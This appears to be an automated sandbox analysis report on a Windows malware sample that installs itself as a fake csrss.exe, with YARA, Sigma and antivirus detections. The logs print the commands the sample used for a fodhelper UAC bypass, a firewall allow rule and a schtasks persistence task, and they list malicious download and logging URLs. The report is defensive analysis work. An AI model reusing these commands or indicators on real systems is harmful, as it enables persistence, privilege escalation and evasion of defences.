39.3.csrss.exe.5fb0000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0.2.1dyvctHqv1.exe.9ad2e0.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
17.2.csrss.exe.9ab080.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
31.2.csrss.exe.400000.1.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0.2.1dyvctHqv1.exe.4fe0e50.11.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0.2.1dyvctHqv1.exe.400000.1.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
33.3.csrss.exe.6559a80.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
17.3.csrss.exe.5fb0000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
50.2.csrss.exe.5700e50.10.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
17.3.csrss.exe.655bce0.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
31.2.csrss.exe.5700e50.10.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
17.2.csrss.exe.400000.3.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
12.3.1dyvctHqv1.exe.5ffbce0.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
52.3.csrss.exe.6559a80.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
31.2.csrss.exe.5caa8d0.9.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
17.2.csrss.exe.9ad2e0.0.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
17.2.csrss.exe.5700e50.9.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
50.3.csrss.exe.6559a80.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
0.2.1dyvctHqv1.exe.5584f30.10.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
12.3.1dyvctHqv1.exe.5a50000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
12.2.1dyvctHqv1.exe.9ab080.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
39.2.csrss.exe.9a56e0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
50.2.csrss.exe.400000.2.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
33.2.csrss.exe.9a56e0.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
52.2.csrss.exe.5caa8d0.9.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
12.2.1dyvctHqv1.exe.400000.2.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
33.2.csrss.exe.5700e50.11.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
33.2.csrss.exe.5ca4f30.9.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
0.3.1dyvctHqv1.exe.5890000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
39.3.csrss.exe.65540e0.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
52.2.csrss.exe.5700e50.10.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
31.2.csrss.exe.9a56e0.0.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
39.3.csrss.exe.655bce0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
39.2.csrss.exe.5700e50.9.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
50.3.csrss.exe.655bce0.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
12.3.1dyvctHqv1.exe.5ff9a80.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
50.2.csrss.exe.5700e50.10.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
31.2.csrss.exe.5700e50.10.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
17.2.csrss.exe.400000.3.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
39.2.csrss.exe.400000.0.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
33.2.csrss.exe.5700e50.11.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
52.2.csrss.exe.400000.3.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
39.2.csrss.exe.5700e50.9.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
52.3.csrss.exe.5fb0000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0.2.1dyvctHqv1.exe.4fe0e50.11.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
52.2.csrss.exe.400000.3.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
12.2.1dyvctHqv1.exe.400000.2.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
31.3.csrss.exe.5fb0000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
33.3.csrss.exe.5fb0000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
Click to see the 99 entries

Sigma Overview

System Summary:

Sigma detected: System File Execution Location Anomaly

Show sources

Source: Process started

Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: C:\Windows\rss\csrss.exe /301-301, CommandLine: C:\Windows\rss\csrss.exe /301-301, CommandLine|base64offset|contains: }5}5, Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: C:\Users\user\Desktop\1dyvctHqv1.exe, ParentImage: C:\Users\user\Desktop\1dyvctHqv1.exe, ParentProcessId: 5384, ProcessCommandLine: C:\Windows\rss\csrss.exe /301-301, ProcessId: 6644

Sigma detected: Bypass UAC via Fodhelper.exe

Show sources

Source: Process started

Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community: Data: Command: "C:\Windows\rss\csrss.exe" , CommandLine: "C:\Windows\rss\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: "C:\Windows\system32\fodhelper.exe" , ParentImage: C:\Windows\System32\fodhelper.exe, ParentProcessId: 3336, ProcessCommandLine: "C:\Windows\rss\csrss.exe" , ProcessId: 6880

Sigma detected: Netsh Port or Application Allowed

Show sources

Source: Process started

Author: Markus Neis, Sander Wiebing: Data: Command: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes, CommandLine: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6860, ProcessCommandLine: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes, ProcessId: 6840

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

Author: vburov: Data: Command: C:\Windows\rss\csrss.exe /301-301, CommandLine: C:\Windows\rss\csrss.exe /301-301, CommandLine|base64offset|contains: }5}5, Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: C:\Users\user\Desktop\1dyvctHqv1.exe, ParentImage: C:\Users\user\Desktop\1dyvctHqv1.exe, ParentProcessId: 5384, ProcessCommandLine: C:\Windows\rss\csrss.exe /301-301, ProcessId: 6644

Persistence and Installation Behavior:

Sigma detected: Schedule system process

Show sources

Source: Process started

Author: Joe Security: Data: Command: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, CommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\rss\csrss.exe /301-301, ParentImage: C:\Windows\rss\csrss.exe, ParentProcessId: 6644, ProcessCommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, ProcessId: 5972

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://newscommer.com/app/app.exe	URL Reputation: Label: malware
Source: https://runmodes.com/api/log	Avira URL Cloud: Label: malware
Source: https://runmodes.com/api/log3633e481-2f88-4842-b7ba-c5d7e0cc011f.uuid.trumops.com	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe	Avira: detection malicious, Label: TR/Agent.twerk
Source: C:\Windows\windefender.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.eocey
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll	Avira: detection malicious, Label: TR/Redcap.gsjan

Multi AV Scanner detection for submitted file

Show sources

Source: 1dyvctHqv1.exe

Virustotal: Detection: 19%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll	Metadefender: Detection: 45%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll	ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe	Metadefender: Detection: 13%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe	ReversingLabs: Detection: 73%
Source: C:\Windows\rss\csrss.exe	ReversingLabs: Detection: 25%
Source: C:\Windows\windefender.exe	Metadefender: Detection: 28%	Perma Link
Source: C:\Windows\windefender.exe	ReversingLabs: Detection: 78%

Machine Learning detection for sample

Show sources

Source: 1dyvctHqv1.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Windows\rss\csrss.exe

Joe Sandbox ML: detected

Source: 17.2.csrss.exe.16c3a000.17.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 17.2.csrss.exe.16bba000.16.unpack	Avira: Label: TR/Patched.Ren.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Unpacked PE file: 0.2.1dyvctHqv1.exe.400000.1.unpack
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Unpacked PE file: 12.2.1dyvctHqv1.exe.400000.2.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 17.2.csrss.exe.400000.3.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 31.2.csrss.exe.400000.1.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 33.2.csrss.exe.400000.2.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 39.2.csrss.exe.400000.0.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 50.2.csrss.exe.400000.2.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 52.2.csrss.exe.400000.3.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 52.2.csrss.exe.400000.3.unpack

Source: 1dyvctHqv1.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\1dyvctHqv1.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: Loader.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: EfiGuardDxe.pdb7 source: csrss.exe
Source:	Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: Age does not matchThe module age and .pdb age do not match. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: symsrv.pdb source: csrss.exe
Source:	Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Downloading symbols for [%s] %ssrvsymsrvhttp://https://_bad_pdb_file.pdb source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: Unable to locate the .pdb file in this location source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
